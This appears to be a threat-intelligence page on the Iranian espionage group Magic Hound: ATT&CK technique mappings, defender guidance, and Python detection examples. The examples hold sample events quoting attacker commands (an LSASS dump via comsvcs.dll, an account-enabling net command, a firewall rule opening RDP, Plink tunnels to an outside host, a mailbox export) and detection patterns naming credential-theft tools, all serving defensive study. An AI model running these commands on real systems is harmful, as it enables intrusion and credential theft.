G0059: Magic Hound
Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.[1][2][3][4][5]
Analyst context for executives and security teams
Magic Hound matters because MITRE describes it as a long-running, resource-intensive Iranian-sponsored cyber espionage group using complex social engineering against government, military, academic, journalist, and health-related targets. For leaders, the practical risk is not only malware execution; it is the combination of human targeting, credential theft, discovery, and remote access behaviors that can turn a successful lure into sustained access to sensitive people, accounts, and systems.
Executive priority
Prioritize this as an identity, endpoint, and incident-readiness problem for organizations with exposed executives, researchers, policy, defense, media, health, or regional interests. Ask whether high-risk users have phishing-resistant account protections, whether credential dumping and remote administration activity would be visible, and whether incident response can quickly determine which accounts, hosts, and sensitive files were accessed after a social-engineering-led intrusion.
Technical view
ATT&CK does not provide group-level tactics, platforms, or detection text for this object, so validation should be driven by the related techniques and software. Relationships show use of Windows-oriented credential and admin tooling such as Mimikatz, PsExec, Net, ipconfig, netsh, CharmPower, and PowerLess; cross-platform tools such as Pupy, Impacket, and FRP; and techniques including LSASS Memory, local data collection, network and user discovery, RDP, command obfuscation, and encoded files. SOC teams should test whether they can correlate social-engineering entry indicators with endpoint process execution, PowerShell activity, credential access attempts, RDP logons, discovery commands, and proxy or remote-access tooling.
Likely telemetry
- Email, web, and collaboration security logs for social-engineering delivery and suspicious links where available
- Identity provider and authentication logs, including unusual sign-ins, MFA events, and account takeover indicators
- Endpoint process creation and command-line telemetry for Net, ipconfig, netsh, systeminfo, ping, PowerShell, PsExec-like execution, and obfuscated commands
- Windows security and EDR events related to LSASS access or credential dumping behavior
- RDP logon records, lateral movement indicators, and administrative remote execution activity
Detection direction
- Do not rely on a single Magic Hound signature; ATT&CK provides no official detection guidance for this group object.
- Prioritize behavior chains: social engineering or credential activity followed by discovery commands, LSASS access, RDP, PsExec/Impacket-style remote execution, and data staging or local file access.
- Tune carefully for legitimate administration tools. Net, PsExec, ping, ipconfig, netsh, systeminfo, RDP, and Impacket-like activity may be benign in admin contexts, so detections should include user, host role, time, parent process, command-line, and remote peer context.
- Validate PowerShell visibility because related software includes PowerShell-based modular backdoors CharmPower and PowerLess.
- Review blind spots around personal or third-party communications channels, unmanaged devices, and high-risk individuals, since the official description emphasizes complex social engineering and targeting of people as well as organizations.
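The behavior-chain and tuning points in the bullets above, as an added example that is not part of the ATT&CK object or the Glexia analysis: a small Python correlator that tags constructed process-creation records (field names modelled loosely on Sysmon Event ID 1 and Windows 4688, every sample event invented for illustration) with a stage drawn from the procedures in the technique table on this page, decodes PowerShell `-EncodedCommand` payloads before matching so encoded activity stays visible, and alerts only when one host shows several distinct stages inside a time window. The (host role, user) admin baseline is one way to keep quser, Plink and scheduled-task use on a jump host from alerting while the same mix on an Exchange server under w3wp.exe still does. The regex patterns are illustrative, not a vetted production ruleset.

```python
"""Behavior-chain correlation over constructed process-creation events.

Added example (not ATT&CK text or Glexia analysis). Records mimic a subset of
Sysmon Event ID 1 / Windows 4688 fields; field names and all sample events are
constructed for illustration. Stage patterns paraphrase the procedures listed
on this page and are not a vetted production ruleset.
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (stage label, pattern applied to the normalized command line)
STAGE_RULES = [
    ("discovery", re.compile(
        r"\bnltest\b.*?/trusted_domains|\bquser\b|\bsysteminfo\b|\bipconfig\b"
        r"|\bnet1?(?:\.exe)?\s+(?:user|group|localgroup)\b(?!.*/(?:add|active|delete))", re.I)),
    ("credential_access", re.compile(r"comsvcs\.dll\W+MiniDump|\bmimikatz\b|\bsekurlsa\b", re.I)),
    ("account_manipulation", re.compile(
        r"\bnet1?(?:\.exe)?\s+user\s+\S+.*?/(?:add|active:yes)"
        r"|\bnet1?(?:\.exe)?\s+localgroup\s+.*?/add", re.I)),
    ("firewall_modification", re.compile(
        r"\bnetsh\b.*?advfirewall\s+firewall\s+add\s+rule.*?localport=3389", re.I)),
    ("persistence", re.compile(r"\bschtasks\b.*?/create|\breg\b\s+add\b.*?\\CurrentVersion\\Run", re.I)),
    ("collection", re.compile(r"New-MailboxExportRequest", re.I)),
    ("remote_access", re.compile(r"\bplink\b.*?\s-[RL]\s+\S*3389|\bfrp[cs]?\b|\bmstsc\b", re.I)),
]

# powershell.exe accepts abbreviated forms of -EncodedCommand; payload is UTF-16LE base64.
ENC_RE = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def normalize(cmdline):
    """Append the decoded text of any -EncodedCommand payload so rules can see it."""
    out = cmdline
    for b64 in ENC_RE.findall(cmdline):
        try:
            out += " ;; decoded: " + base64.b64decode(b64, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            pass  # not valid base64/UTF-16LE; leave the raw token in place
    return out


def classify(cmdline):
    """Map one command line to the set of stage labels it matches."""
    text = normalize(cmdline)
    return {stage for stage, rx in STAGE_RULES if rx.search(text)}


def enc(script):
    """Constructed helper: build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real logs). EXCH01 mimics the web-shell
# driven Exchange chain described on this page; JUMP01 is a legitimate admin.
EX = {"host": "EXCH01", "role": "exchange", "user": r"NT AUTHORITY\SYSTEM", "parent": "w3wp.exe"}
JP = {"host": "JUMP01", "role": "jump_host", "user": r"CORP\svc-admin", "parent": "cmd.exe"}
EVENTS = [
    dict(EX, time="2021-11-05T08:02:10", cmd="cmd.exe /c nltest /trusted_domains"),
    dict(EX, time="2021-11-05T08:05:41", cmd='"powershell.exe" /c net user DefaultAccount /active:yes'),
    dict(EX, time="2021-11-05T08:06:02", cmd='net localgroup "Remote Desktop Users" DefaultAccount /add'),
    dict(EX, time="2021-11-05T08:07:15", cmd='"netsh" advfirewall firewall add rule name="Terminal Server" '
                                             'dir=in action=allow protocol=TCP localport=3389'),
    dict(EX, time="2021-11-05T08:20:33", cmd=r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Windows\Temp\l.dmp full"),
    dict(EX, time="2021-11-05T08:40:09", cmd="powershell.exe -NoP -W Hidden -enc "
         + enc(r"New-MailboxExportRequest -Mailbox ceo -FilePath \\EXCH01\C$\Temp\m.pst")),
    dict(JP, time="2021-11-05T09:00:00", cmd="quser"),
    dict(JP, time="2021-11-05T09:01:30", cmd="plink.exe -ssh -P 22 -l ops -R 13389:127.0.0.1:3389 bastion.corp.example"),
    dict(JP, time="2021-11-05T09:03:00", cmd=r'schtasks /create /tn "Backup" /tr C:\ops\backup.cmd /sc daily'),
]
# (host role, user) pairs for which discovery and remote access are expected.
ADMIN_BASELINE = frozenset({("jump_host", r"CORP\svc-admin")})


def correlate(events, window_minutes=60, min_stages=3, admin_baseline=ADMIN_BASELINE):
    """Alert per host when at least min_stages distinct stages occur within the window.
    For baselined (role, user) pairs, discovery and remote_access are not counted."""
    by_host = defaultdict(list)
    for ev in events:
        stages = classify(ev["cmd"])
        if (ev["role"], ev["user"]) in admin_baseline:
            stages -= {"discovery", "remote_access"}
        if stages:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["time"]), stages, ev))
    window, alerts = timedelta(minutes=window_minutes), {}
    for host, tagged in by_host.items():
        tagged.sort(key=lambda t: t[0])
        for i, (start, _, first) in enumerate(tagged):
            seen, cmds = set(), []
            for when, stages, ev in tagged[i:]:
                if when - start > window:
                    break
                seen |= stages
                cmds.append(ev["cmd"])
            if len(seen) >= min_stages:
                alerts[host] = {"first_seen": start.isoformat(), "parent": first["parent"],
                                "user": first["user"], "stages": sorted(seen), "commands": cmds}
                break
    return alerts


if __name__ == "__main__":
    for host, alert in correlate(EVENTS).items():
        print(host, alert["parent"], alert["user"], alert["stages"])
```

With the baseline in place only EXCH01 alerts (five stages under w3wp.exe); passing `admin_baseline=frozenset()` makes JUMP01 alert too on quser, the Plink tunnel and the scheduled task, which is exactly the false positive the tuning bullet warns about. The baseline should be keyed on context your environment actually records (host role, user, parent, remote peer), not on tool names.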
Mitigation priorities
- Start with high-risk user protection: phishing-resistant MFA where feasible, strong account recovery controls, and security awareness focused on targeted social engineering.
- Reduce credential theft impact by limiting local admin rights, protecting privileged accounts, and monitoring or restricting access to LSASS where supported by the environment.
- Harden and monitor remote administration paths such as RDP, PsExec-style execution, and administrative shares; restrict exposure and require strong authentication.
- Improve endpoint logging for command-line, PowerShell, script execution, and credential access events before relying on advanced analytics.
- Segment sensitive research, policy, executive, and operational systems so a compromised user account does not provide broad discovery or lateral movement paths.
Analyst notes and limits
The strongest decision value comes from the relationship context: Magic Hound is associated with credential dumping, discovery, remote access, obfuscation, local data collection, and multiple dual-use or open-source tools. The group also consolidates the revoked Charming Kitten object, so defenders should map historical reporting names such as TA453, APT35, Phosphorus, COBALT ILLUSION, Newscaster, and Mint Sandstorm when searching threat intelligence and internal cases.
ATT&CK supplies no official detection text, no group-level platforms, and no group-level tactics for this object. This assessment therefore does not claim detection coverage or current exploitation and relies only on the supplied description, references, aliases, and relationships. Local telemetry, asset exposure, user risk, and business mission context are required to determine actual priority.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1056.001 | Keylogging | Magic Hound malware is capable of keylogging. (Citation: Unit 42 Magic Hound Feb 2017) |
| Enterprise | T1567 | Exfiltration Over Web Service | Magic Hound has used the Telegram API `sendMessage` to relay data on compromised devices. (Citation: Google Iran Threats October 2021) |
| Enterprise | T1589.001 | Credentials | Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites. Magic Hound has also collected credentials from over 900 Fortinet VPN servers in the US, Europe, and Israel. (Citation: IBM ITG18 2020)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | Magic Hound malware has used Registry Run keys to establish persistence. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1059.001 | PowerShell | Magic Hound has used PowerShell for execution and privilege escalation. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1016.002 | Wi-Fi Discovery | Magic Hound has collected names and passwords of all Wi-Fi networks to which a device has previously connected. (Citation: Check Point APT35 CharmPower January 2022) |
| Enterprise | T1588.002 | Tool | Magic Hound has obtained and used tools like Havij, sqlmap, Metasploit, Mimikatz, and Plink. (Citation: Check Point Rocket Kitten)(Citation: FireEye APT35 2018)(Citation: Check Point APT35 CharmPower January 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1584.001 | Domains | Magic Hound has used compromised domains to host links targeted to specific phishing victims. (Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 July2021)(Citation: Certfa Charming Kitten January 2021)(Citation: Google Iran Threats October 2021) |
| Enterprise | T1059.003 | Windows Command Shell | Magic Hound has used the command-line interface for code execution. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1572 | Protocol Tunneling | Magic Hound has used Plink to tunnel RDP over SSH. (Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1585.002 | Email Accounts | Magic Hound has established email accounts using fake personas for spearphishing operations. (Citation: IBM ITG18 2020)(Citation: Proofpoint TA453 March 2021) |
| Enterprise | T1591.001 | Determine Physical Locations | Magic Hound has collected location information from visitors to their phishing sites. (Citation: Google Iran Threats October 2021) |
| Enterprise | T1071 | Application Layer Protocol | Magic Hound malware has used IRC for C2. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1071.001 | Web Protocols | Magic Hound has used HTTP for C2. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1486 | Data Encrypted for Impact | Magic Hound has used BitLocker and DiskCryptor to encrypt targeted workstations. (Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1016.001 | Internet Connection Discovery | Magic Hound has conducted a network call out to a specific website as part of their initial discovery activity. (Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1586.002 | Email Accounts | Magic Hound has compromised personal email accounts through the use of legitimate credentials and gathered additional victim information. (Citation: IBM ITG18 2020) |
| Enterprise | T1053.005 | Scheduled Task | Magic Hound has used scheduled tasks to establish persistence and execution. (Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1592.002 | Software | Magic Hound has captured the user-agent strings from visitors to their phishing sites. (Citation: Google Iran Threats October 2021) |
| Enterprise | T1021.001 | Remote Desktop Protocol | Magic Hound has used Remote Desktop Services to copy tools on targeted systems. (Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1087.003 | Email Account | Magic Hound has used PowerShell to discover email accounts. (Citation: DFIR Report APT35 ProxyShell March 2022) |
| Enterprise | T1105 | Ingress Tool Transfer | Magic Hound has downloaded additional code and files from servers onto victims. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1190 | Exploit Public-Facing Application | Magic Hound has exploited the Log4j utility (CVE-2021-44228), on-premises MS Exchange servers via "ProxyShell" (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and FortiOS SSL VPNs (CVE-2018-13379). (Citation: Check Point APT35 CharmPower January 2022)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: Cybereason PowerLess February 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)(Citation: Microsoft Log4j Vulnerability Exploitation December 2021) |
| Enterprise | T1204.002 | Malicious File | Magic Hound has attempted to lure victims into opening malicious email attachments. (Citation: ClearSky Kittens Back 3 August 2020) |
| Enterprise | T1218.011 | Rundll32 | Magic Hound has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory. (Citation: DFIR Report APT35 ProxyShell March 2022) |
| Enterprise | T1027.010 | Command Obfuscation | Magic Hound has used base64-encoded commands. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1046 | Network Service Discovery | Magic Hound has used KPortScan 3.0 to perform SMB, RDP, and LDAP scanning. (Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1590.005 | IP Addresses | Magic Hound has captured the IP addresses of visitors to their phishing sites. (Citation: Google Iran Threats October 2021) |
| Enterprise | T1113 | Screen Capture | Magic Hound malware can take a screenshot and upload the file to its C2 server. (Citation: Unit 42 Magic Hound Feb 2017) |
| Enterprise | T1573 | Encrypted Channel | Magic Hound has used an encrypted HTTP proxy in C2 communications. (Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1059.005 | Visual Basic | Magic Hound malware has used VBS scripts for execution. (Citation: Unit 42 Magic Hound Feb 2017) |
| Enterprise | T1685.001 | Disable or Modify Windows Event Log | Magic Hound has executed scripts to disable the event log service. (Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1595.002 | Vulnerability Scanning | Magic Hound has conducted widespread scanning to identify public-facing systems vulnerable to CVE-2021-44228 in Log4j and ProxyShell vulnerabilities; CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in on-premises MS Exchange Servers; and CVE-2018-13379 in Fortinet FortiOS SSL VPNs. (Citation: Check Point APT35 CharmPower January 2022)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1036.010 | Masquerade Account Name | Magic Hound has created local accounts named `help` and `DefaultAccount` on compromised machines. (Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1589.002 | Email Addresses | Magic Hound has identified high-value email accounts in academia, journalism, NGOs, foreign policy, and national security for targeting. (Citation: Proofpoint TA453 July2021)(Citation: Google Iran Threats October 2021) |
| Enterprise | T1204.001 | Malicious Link | Magic Hound has attempted to lure victims into opening malicious links embedded in emails. (Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021) |
| Enterprise | T1102.002 | Bidirectional Communication | Magic Hound malware can use a SOAP Web service to communicate with its C2 server. (Citation: Unit 42 Magic Hound Feb 2017) |
| Enterprise | T1033 | System Owner/User Discovery | Magic Hound malware has obtained the victim username and sent it to the C2 server. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1098.002 | Additional Email Delegate Permissions | Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations. (Citation: FireEye APT35 2018) |
| Enterprise | T1070.004 | File Deletion | Magic Hound has deleted and overwrote files to cover tracks. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1027.013 | Encrypted/Encoded File | Magic Hound malware has used base64-encoded files and has also encrypted embedded strings with AES. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1566.002 | Spearphishing Link | Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShell scripts to download Pupy. (Citation: Secureworks Cobalt Gypsy Feb 2017)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1078.001 | Default Accounts | Magic Hound enabled and used the default system managed account, DefaultAccount, via `"powershell.exe" /c net user DefaultAccount /active:yes` to connect to a targeted Exchange server over RDP. (Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1083 | File and Directory Discovery | Magic Hound malware can list a victim's logical drives and the type, as well as the total/free space of the fixed devices. Other malware can list a directory's contents. (Citation: Unit 42 Magic Hound Feb 2017) |
| Enterprise | T1016 | System Network Configuration Discovery | Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location | Magic Hound has used `dllhost.exe` to mask Fast Reverse Proxy (FRP) and `MicrosoftOutLookUpdater.exe` for Plink. (Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1098.007 | Additional Local or Domain Groups | Magic Hound has added a user named DefaultAccount to the Administrators and Remote Desktop Users groups. (Citation: DFIR Report APT35 ProxyShell March 2022) |
| Enterprise | T1598.003 | Spearphishing Link | Magic Hound has used SMS and email messages with links designed to steal credentials or track victims. (Citation: Certfa Charming Kitten January 2021)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Google Iran Threats October 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1049 | System Network Connections Discovery | Magic Hound has used quser.exe to identify existing RDP connections. (Citation: DFIR Report APT35 ProxyShell March 2022) |
| Enterprise | T1114 | Email Collection | Magic Hound has compromised email credentials in order to steal sensitive data. (Citation: Certfa Charming Kitten January 2021) |
| Enterprise | T1003.001 | LSASS Memory | Magic Hound has stolen domain credentials by dumping LSASS process memory using Task Manager, comsvcs.dll, and from a Microsoft Active Directory Domain Controller using Mimikatz. (Citation: FireEye APT35 2018)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1570 | Lateral Tool Transfer | Magic Hound has copied tools within a compromised network using RDP. (Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1136.001 | Local Account | Magic Hound has created local accounts named `help` and `DefaultAccount` on compromised machines. (Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: Microsoft Iranian Threat Actor Trends November 2021) |
| Enterprise | T1057 | Process Discovery | Magic Hound malware can list running processes. (Citation: Unit 42 Magic Hound Feb 2017) |
| Enterprise | T1114.002 | Remote Email Collection | Magic Hound has exported emails from compromised Exchange servers including through use of the cmdlet `New-MailboxExportRequest`. (Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1571 | Non-Standard Port | Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1686.003 | Windows Host Firewall | Magic Hound has added the following rule to a victim's Windows firewall to allow RDP traffic: `"netsh" advfirewall firewall add rule name="Terminal Server" dir=in action=allow protocol=TCP localport=3389`. (Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1070.003 | Clear Command History | Magic Hound has removed mailbox export requests from compromised Exchange servers. (Citation: DFIR Report APT35 ProxyShell March 2022) |
| Enterprise | T1082 | System Information Discovery | Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server. (Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1114.001 | Local Email Collection | Magic Hound has collected .PST archives. (Citation: FireEye APT35 2018) |
| Enterprise | T1505.003 | Web Shell | Magic Hound has used multiple web shells to gain execution. (Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1090 | Proxy | Magic Hound has used Fast Reverse Proxy (FRP) for RDP traffic. (Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1036.004 | Masquerade Task or Service | Magic Hound has named a malicious script CacheTask.bat to mimic a legitimate task. (Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1583.001 | Domains | Magic Hound has registered fraudulent domains such as "mail-newyorker.com" and "news12.com.recover-session-service.site" to target specific victims with phishing attacks. (Citation: Certfa Charming Kitten January 2021) |
| Enterprise | T1018 | Remote System Discovery | Magic Hound has used Ping for discovery on targeted networks. (Citation: DFIR Phosphorus November 2021) |
| Enterprise | T1112 | Modify Registry | Magic Hound has modified Registry settings for security tools. (Citation: DFIR Report APT35 ProxyShell March 2022) |
| Enterprise | T1482 | Domain Trust Discovery | Magic Hound has used a web shell to execute `nltest /trusted_domains` to identify trust relationships. (Citation: DFIR Phosphorus November 2021) |
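For the masquerading and tunneling rows above (T1036.005, T1572 and T1090: FRP run as `dllhost.exe`, Plink run as `MicrosoftOutLookUpdater.exe`, RDP tunneled over SSH), an added example that is not from ATT&CK or the cited reports: checks over constructed process-creation records carrying the Image, OriginalFileName and CommandLine fields that Sysmon Event ID 1 records. The paths, command lines and OriginalFileName values are constructed for illustration (the `Plink` OriginalFileName in particular is assumed, not verified against the binary), and the field names are the example's own.

```python
"""Masquerade and tunnel checks over constructed process-creation records.

Added example (not ATT&CK text or Glexia analysis). Records mimic Sysmon
Event ID 1 fields (Image, OriginalFileName from the PE version resource,
CommandLine); field names, paths, OriginalFileName values and command lines
are constructed for illustration, not observed indicators.
"""
import re
from pathlib import PureWindowsPath

# Binaries that legitimately live only under the Windows system directories.
# Copies elsewhere (ProgramData, Users, Temp) are the T1036.005 pattern on this page.
SYSTEM_BINARIES = {"dllhost.exe", "svchost.exe", "rundll32.exe", "lsass.exe", "conhost.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# SSH-style port forward that lands on RDP (plink/ssh -R or -L ... :3389),
# and FRP-style client/server names or config files on the command line.
RDP_TUNNEL_RE = re.compile(r"(?:^|\s)-[RL]\s*\S*:3389(?:\s|$)")
FRP_RE = re.compile(r"\bfrp[cs]\b|\bfrp[cs]?\.(?:ini|toml|ya?ml)\b", re.I)


def review_event(ev):
    """Return the reasons one event looks like a masqueraded or tunneling tool (empty if none)."""
    path = PureWindowsPath(ev["image"])
    name = path.name.lower()
    reasons = []
    if name in SYSTEM_BINARIES and not str(path.parent).lower().startswith(SYSTEM_DIRS):
        reasons.append("path_outside_system_dir")
    ofn = ev.get("original_file_name", "-")
    if ofn in ("", "-"):
        # Sysmon records "-" when the PE has no version resource (common for Go binaries such as FRP).
        if name in SYSTEM_BINARIES:
            reasons.append("no_version_info_for_system_name")
    elif PureWindowsPath(ofn).stem.lower() != path.stem.lower():
        # Compare stems case-insensitively: "Plink" vs plink.exe is not a mismatch.
        reasons.append("original_file_name_mismatch")
    if RDP_TUNNEL_RE.search(ev["cmdline"]):
        reasons.append("rdp_tunnel_arguments")
    if FRP_RE.search(ev["cmdline"]):
        reasons.append("frp_style_arguments")
    return reasons


def review(events):
    """Run review_event over a batch and keep only the events with findings."""
    out = []
    for ev in events:
        reasons = review_event(ev)
        if reasons:
            out.append({"image": ev["image"], "reasons": reasons})
    return out


# Constructed sample records (not real telemetry).
EVENTS = [
    {"image": r"C:\Users\Public\dllhost.exe", "original_file_name": "-",
     "cmdline": r"C:\Users\Public\dllhost.exe -c C:\Users\Public\frpc.ini"},
    {"image": r"C:\ProgramData\MicrosoftOutLookUpdater.exe", "original_file_name": "Plink",
     "cmdline": r"C:\ProgramData\MicrosoftOutLookUpdater.exe -ssh -P 443 -l ops -pw x "
                r"-R 12345:127.0.0.1:3389 203.0.113.5"},
    {"image": r"C:\Windows\System32\dllhost.exe", "original_file_name": "dllhost.exe",
     "cmdline": r"C:\Windows\System32\dllhost.exe /Processid:{01234567-89AB-CDEF-0123-456789ABCDEF}"},
    {"image": r"C:\Program Files\PuTTY\plink.exe", "original_file_name": "Plink",
     "cmdline": r'"C:\Program Files\PuTTY\plink.exe" -ssh -batch ops@bastion.corp.example uptime'},
]

if __name__ == "__main__":
    for finding in review(EVENTS):
        print(finding["image"], ", ".join(finding["reasons"]))
```

An OriginalFileName mismatch on its own is a weak signal (renamed installers and copied admin tools are common), so treat it as a reason to pull path, signer, parent process and network peer context rather than as an alert by itself; the combination of a system-binary name outside the system directory with no version resource and an FRP-style config argument is what makes the first record stand out.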
Groups, software, and campaigns
G0058: Charming Kitten
Charming Kitten is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. Charming Kitten often tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, Magic Hound, resulting in reporting that may not distinguish between the two groups' activities.[1]
S0039: Net
The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. [1]
Net has a great deal of functionality, [2] much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through SMB/Windows Admin Shares using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.
S0357: Impacket
S0097: Ping
S0674: CharmPower
CharmPower is a PowerShell-based, modular backdoor that has been used by Magic Hound since at least 2022.[1]
S1144: FRP
FRP, which stands for Fast Reverse Proxy, is an openly available tool that is capable of exposing a server located behind a firewall or Network Address Translation (NAT) to the Internet. FRP can support multiple protocols including TCP, UDP, and HTTP(S) and has been abused by threat actors to proxy command and control communications.[1][2][3][4]
S0002: Mimikatz
S0096: Systeminfo
Systeminfo is a Windows utility that can be used to gather detailed information about a computer. [1]
S0100: ipconfig
S0108: netsh
S1012: PowerLess
PowerLess is a PowerShell-based modular backdoor that has been used by Magic Hound since at least 2022.[1]
S0192: Pupy
Pupy is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. [1] It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). [1] Pupy is publicly available on GitHub. [1]
S0186: DownPaper
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 6.1 | | Current bundle | b29c155c46a7… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] FireEye APT35 2018: Mandiant. (2018). Mandiant M-Trends 2018. Retrieved November 17, 2024.
